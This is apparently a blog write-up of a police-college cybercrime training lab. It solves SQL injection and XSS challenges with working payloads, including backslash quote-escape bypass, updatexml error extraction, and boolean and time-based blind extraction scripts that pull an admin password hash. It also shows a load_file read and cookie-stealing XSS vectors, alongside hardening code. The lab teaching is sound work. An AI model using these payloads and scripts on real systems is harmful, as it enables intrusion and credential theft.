Shandong Police College (山警) Cybercrime Investigation Practical Training

This post was last updated on April 13, 2026 (afternoon).

I originally just meant to help a senior classmate from the investigation programme with her homework, but some of the problems turned out to be really good, so I put together a writeup.

Offensive and Defensive Skills Training

SQL Injection

level3

Single quotes are filtered, so the usual "universal password" (`' or 1=1#`) cannot be used. The backslash, MySQL's escape character, is not filtered, though. Putting a backslash at the end of the username turns the quote that was supposed to close the username literal into an escaped quote inside it. The literal then runs on until the quote that was supposed to open the password literal, so whatever we put in the password field lands in SQL context, and the trailing `#` comments out the leftover quote.

```sql
-- Original query
SELECT * FROM users WHERE username='admin' AND password='123456';

-- With single quotes filtered, a backslash escapes the closing quote instead
-- (request body; `&` separates the two parameters):
username=admin\&password=or 1=1#
-- Resulting query; the username literal is now `admin' AND password=`
SELECT * FROM users WHERE username='admin\' AND password=or 1=1#';
```

This only works because the application strips `'` but leaves `\` alone. Escaping routines such as `addslashes` / `mysql_real_escape_string` double the backslash as well, and a parameterised query is not affected at all.
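To see exactly where the string boundaries fall, here is an added example (not code from the challenge or the original post) with a minimal MySQL-style string lexer. The `build_query_vulnerable` function is an assumption about the challenge's server logic: it strips single quotes and then concatenates; `build_query_escaped` is the same query built with backslash-and-quote escaping as a comparison.

```python
def build_query_vulnerable(username: str, password: str) -> str:
    """Assumed challenge logic: strip single quotes only, then concatenate into the SQL."""
    username = username.replace("'", "")
    password = password.replace("'", "")
    return f"SELECT * FROM users WHERE username='{username}' AND password='{password}';"


def mysql_escape(s: str) -> str:
    """Escape the way mysql_real_escape_string does for the two characters that matter here:
    the backslash first, then the quote (order matters, or the quote's escape gets re-escaped)."""
    return s.replace("\\", "\\\\").replace("'", "\\'")


def build_query_escaped(username: str, password: str) -> str:
    """Same query, but every user-controlled value goes through mysql_escape()."""
    return (f"SELECT * FROM users WHERE username='{mysql_escape(username)}' "
            f"AND password='{mysql_escape(password)}';")


def split_sql(sql: str):
    """Tokenise `sql` like a MySQL lexer would: single-quoted literals with backslash escapes
    and '' doubling, and a `#` / `-- ` comment that swallows the rest of the line.
    Returns (code_outside_strings, [literal, ...]); each literal is replaced by `?` in the code."""
    code, literals = [], []
    i, n = 0, len(sql)
    while i < n:
        c = sql[i]
        if c == "'":
            buf = []
            i += 1
            while i < n:
                ch = sql[i]
                if ch == "\\" and i + 1 < n:          # backslash escape: take next char verbatim
                    buf.append(sql[i + 1])
                    i += 2
                elif ch == "'":
                    if i + 1 < n and sql[i + 1] == "'":  # '' inside a literal is a single quote
                        buf.append("'")
                        i += 2
                    else:                             # real end of the literal
                        i += 1
                        break
                else:
                    buf.append(ch)
                    i += 1
            literals.append("".join(buf))
            code.append("?")
        elif c == "#" or sql.startswith("-- ", i):    # comment: nothing after it is executed
            break
        else:
            code.append(c)
            i += 1
    return "".join(code), literals


if __name__ == "__main__":
    for builder in (build_query_vulnerable, build_query_escaped):
        q = builder("admin\\", "or 1=1#")
        code, lits = split_sql(q)
        print(f"{builder.__name__}:\n  sql  = {q}\n  code = {code}\n  literals = {lits}")
```

With the quote-stripping filter, the executed code is `SELECT * FROM users WHERE username=?or 1=1` and the only literal is `admin' AND password=`; with escaping, there are two literals (`admin\` and `or 1=1#`) and the code still reads `... username=? AND password=?;`.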

level5

Error-based injection. The frontend does not display the result, so intercept the raw response. The `updatexml()` call fails on the invalid XPath built by `concat()`, and MySQL echoes the offending string back in the error message; note that this message is truncated to 32 characters, so a longer value has to be pulled out in pieces with `substr()`.

```sql
15 AND updatexml(1,concat(0x7e,(SELECT password FROM tw_admin WHERE username='李晓晓'),0x7e),1)
```
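The 32-character limit is the part that bites with a 32-character MD5 hash: `~` plus the hash is 33 characters, so the last hex digit is lost. Below is an added example (not from the post or the challenge) that shows the loss and the chunked fix. The backend is a simulated server: it evaluates the injected subquery on SQLite and formats the response the way MySQL's XPATH error does, including the truncation. The admin row and its hash are constructed sample data.

```python
import re
import sqlite3

# Constructed sample data (assumption): one admin row with an MD5-style 32-hex-char password.
SAMPLE_HASH = "e10adc3949ba59abbe56e057f20f883e"
TARGET = "SELECT password FROM tw_admin WHERE username='李晓晓'"


def make_simulated_server():
    """Stand-in for the challenge backend. It only understands the updatexml() payload shape used
    here and reproduces MySQL's behaviour of truncating the XPATH error text to 32 characters."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tw_admin(username TEXT, password TEXT)")
    con.execute("INSERT INTO tw_admin VALUES ('李晓晓', ?)", (SAMPLE_HASH,))
    pat = re.compile(r"15 AND updatexml\(1,concat\(0x7e,\((.*)\),0x7e\),1\)", re.S)

    def send(payload: str) -> str:
        m = pat.fullmatch(payload)
        if not m:
            return "HTTP 200 (no error text)"
        expr = m.group(1)
        sql = expr if expr.upper().startswith("SELECT") else "SELECT " + expr
        value = con.execute(sql).fetchone()[0]
        return "XPATH syntax error: '" + ("~" + str(value) + "~")[:32] + "'"
    return send


def naive_error_extract(send, subquery: str) -> str:
    """The one-shot payload from the page: everything after the leading ~ that survived truncation."""
    resp = send(f"15 AND updatexml(1,concat(0x7e,({subquery}),0x7e),1)")
    return re.search(r"'~([^~']*)", resp).group(1)


def error_based_extract(send, subquery: str, chunk: int = 30) -> str:
    """Chunked extraction: 30 characters plus the two ~ markers is exactly 32, so every chunk
    arrives intact. Stops when a chunk comes back empty (i.e. past the end of the value)."""
    out, pos = "", 1
    while True:
        payload = (f"15 AND updatexml(1,concat(0x7e,"
                   f"(substr(({subquery}),{pos},{chunk})),0x7e),1)")
        m = re.search(r"'~([^~']*)~'", send(payload))
        if not m or not m.group(1):
            return out
        out += m.group(1)
        pos += chunk


if __name__ == "__main__":
    send = make_simulated_server()
    print("one-shot :", naive_error_extract(send, TARGET))   # 31 chars, last digit lost
    print("chunked  :", error_based_extract(send, TARGET))   # full 32-char hash
```

The chunk size of 30 leaves room for both markers; using `substr` offsets 1, 31, 61, ... generalises to values of any length, for example a `group_concat()` over several rows.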

level6

Boolean-based blind injection; we write a script. The page contains the string `1616683585` only when the row for `id=15` is actually returned, so that string serves as the true/false oracle. One request per candidate character and position:

```python
import requests

url = 'https://scene-udqc7v98uosuyz1l-web-3000.zcsz02.sdpc.edu.cn/query'
# Candidate alphabet; ':' is treated as the terminator of the value.
# Lowercase is enough for hex digits; with MySQL's default case-insensitive
# collation it also matches uppercase letters.
str_range = ':-abcdefghijklmnopqrstuvwxyz0123456789'

def getData(str_list):
    j = 1
    while True:
        found = False
        for i in str_list:
            payload = f"15 and substr((select group_concat(password) from tw_admin where username='李晓晓'),{j},1)='{i}'"
            data = {"id": payload}
            r = requests.post(url, data=data)
            # the marker is present only when the injected condition is true
            if "1616683585" in r.text:
                print(i, end="")
                found = True
                if i == ":":
                    print()
                    return 1
                break
        if not found:
            # no candidate matched: end of the value, or a character outside str_range
            print()
            return 0
        j = j + 1

if __name__ == '__main__':
    getData(str_range)
```

level7

Time-based blind injection. The endpoint gives no usable difference in its response body, so each condition is wrapped in `IF(cond, SLEEP(2), 0)` and the response time decides. A binary search over the printable ASCII range needs about seven requests per character instead of one per candidate.

```python
import requests
import time
import sys

url = "https://scene-ijza6xey20aw15i2-web-3000.zcsz02.sdpc.edu.cn/"

def time_query(payload, threshold=1.5):
    """Send the payload; True if the response took at least `threshold` seconds."""
    start = time.time()
    try:
        r = requests.post(url + "check", data={"id": payload}, timeout=15)
        elapsed = time.time() - start
        return elapsed >= threshold, elapsed
    except Exception as e:
        # a network error or the 15 s timeout is treated as "no delay"
        return False, 0

def extract_char(query, pos):
    """Extract one character with a binary search over printable ASCII (32..126)."""
    low, high = 32, 126
    while low < high:
        mid = (low + high) // 2
        payload = f"15 AND IF(ASCII(SUBSTRING(({query}),{pos},1))>{mid},SLEEP(2),0)"
        is_delay, _ = time_query(payload)
        if is_delay:
            low = mid + 1
        else:
            high = mid
    return chr(low)

print("="*60)
print("[*] Extracting 李晓晓's password from tw_admin table")
print("="*60)

# Find the password length (one request per candidate length)
print("\n[*] Finding password length...")
pwd_len = 0
for l in range(1, 100):
    payload = f"15 AND IF(LENGTH((SELECT password FROM tw_admin WHERE username='李晓晓'))={l},SLEEP(2),0)"
    is_delay, _ = time_query(payload)
    if is_delay:
        pwd_len = l
        print(f"[+] Password length: {l}")
        break

if pwd_len == 0:
    print("[-] Could not determine password length")
    sys.exit(1)

# Extract the password character by character
print(f"\n[*] Extracting password ({pwd_len} chars)...")
password = ""
for i in range(1, pwd_len + 1):
    c = extract_char("SELECT password FROM tw_admin WHERE username='李晓晓'", i)
    password += c
    sys.stdout.write(c)
    sys.stdout.flush()

print("\n\n" + "="*60)
print(f"[+] 李晓晓's password hash: {password}")
print("="*60)
```

level8

Read a file through SQL injection with `load_file()`. The frontend does not display the column, so intercept the response. The query has 15 columns; the file contents go in the 13th. (`load_file()` only works if the database user has the FILE privilege and `secure_file_priv` allows the path.)

```sql
id=15 union select 2,4,5,6,7,8,9,1,2,3,4,5,load_file('/home/lixiaoxiao/passwd.txt'),1,2
```

This returns

```
102,108,97,103,58,101,97,102,102,49,51,52,99,50,101,99,101,102,54,48,48,57,54,97,50,57,49,50,99,97,50,52,54,50,49,56,50,58,10
```

These look like decimal ASCII codes (the trailing 10 is the newline); converting them gives

```
flag:eaff134c2ecef60096a2912ca2462182:
```

level9

First look the project up on GitHub.

The vulnerable file the challenge refers to is /admin/Six/Get_Odds_1.php. Its `id` parameter is injectable; a union with seven columns reads the admin table:

```sql
1' union select 1,2,3,4,5,6,group_concat(login_pwd) from sys_admin #
```

This yields the admin user's password hash; cracking it gives the password 120708.

XSS Vulnerabilities

level1

The challenge gives a URL with an XSS flaw; just find a parameter whose value is reflected in the page and inject there.

level2

```html
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
</head>
<body>
<script type='text/javascript'>document.domain=location.host;_ret={"_res":2};try{parent.jsonp123456(_ret);}catch(err){jsonp123456(_ret);}</script>The callback parameter of this page is flawed; try crafting one!
</body>
</html>
```

The flaw is a JSONP endpoint that pastes the `callback` parameter straight into the script as the function to call, without checking that it is a plain identifier. Any JavaScript expression works in that position, so `callback=alert(document.cookie)` is enough: the page becomes `parent.alert(document.cookie)(_ret)`, which runs the alert before the trailing call fails.

level3

```html
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
</head>
<body>
Please enter your name: <input type="text" value="hello,nosugar"></input></body>
</html>
```

The input lands inside a double-quoted `value` attribute without escaping, so we close the attribute and inject an event handler; `autofocus` makes `onfocus` fire without any user interaction:

```
word=" onfocus="alert(document.cookie)" autofocus="
```
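Both XSS levels come down to untrusted input placed in a context (a JavaScript callee name, a quoted HTML attribute) without validation for that context. The added example below (my code, not the challenge's or the post's) renders the two pages with and without the fix: an identifier allowlist for the JSONP callback name, and `html.escape(..., quote=True)` for the attribute value, so that the exact payloads from level2 and level3 stop working. The render functions are assumptions about the server-side templates, written to reproduce the HTML shown above.

```python
import html
import re

# JSONP callback names should be bare identifiers, optionally dotted (e.g. parent.jsonp123456).
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")


def is_valid_callback(name: str) -> bool:
    return CALLBACK_RE.match(name) is not None


def render_jsonp_vulnerable(callback: str, result: int) -> str:
    """Mirrors the level2 page: the callback parameter is pasted into the script unchecked."""
    return ("<script type='text/javascript'>document.domain=location.host;"
            '_ret={"_res":' + str(result) + "};"
            "try{parent." + callback + "(_ret);}catch(err){" + callback + "(_ret);}</script>")


def render_jsonp_safe(callback: str, result: int, default: str = "jsonp123456") -> str:
    """Hardened: anything that is not an identifier is replaced by a fixed default callback."""
    if not is_valid_callback(callback):
        callback = default
    return render_jsonp_vulnerable(callback, result)


def render_input_vulnerable(word: str) -> str:
    """Mirrors the level3 page: the value lands inside a double-quoted attribute unescaped."""
    return 'Please enter your name: <input type="text" value="' + word + '">'


def render_input_safe(word: str) -> str:
    """Hardened: html.escape with quote=True turns \" into &quot;, so the attribute cannot be closed."""
    return 'Please enter your name: <input type="text" value="' + html.escape(word, quote=True) + '">'


def input_attributes(fragment: str) -> list:
    """List the attribute names on the first <input> tag (good enough for well-formed output)."""
    tag = re.search(r"<input\b([^>]*)>", fragment).group(1)
    return re.findall(r'\s([a-zA-Z-]+)(?:="[^"]*")?', tag)


if __name__ == "__main__":
    jsonp_payload = "alert(document.cookie)"
    print(render_jsonp_vulnerable(jsonp_payload, 2))   # parent.alert(document.cookie)(_ret)
    print(render_jsonp_safe(jsonp_payload, 2))         # parent.jsonp123456(_ret)

    xss_payload = '" onfocus="alert(document.cookie)" autofocus="'
    print(input_attributes(render_input_vulnerable(xss_payload)))  # onfocus/autofocus injected
    print(input_attributes(render_input_safe(xss_payload)))        # only type and value
```

The attribute fix assumes the template always quotes the attribute; an unquoted `value=...` would need escaping of spaces as well, which is why quoting every attribute is the baseline rule. For JSONP, rejecting rather than silently replacing the callback is equally valid; the important part is that the name never reaches the script unless it matches the allowlist.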

Original post: https://www.sunynov.top/2026/04/13/山警网络犯罪侦查实训/
Author: suny
Published: April 13, 2026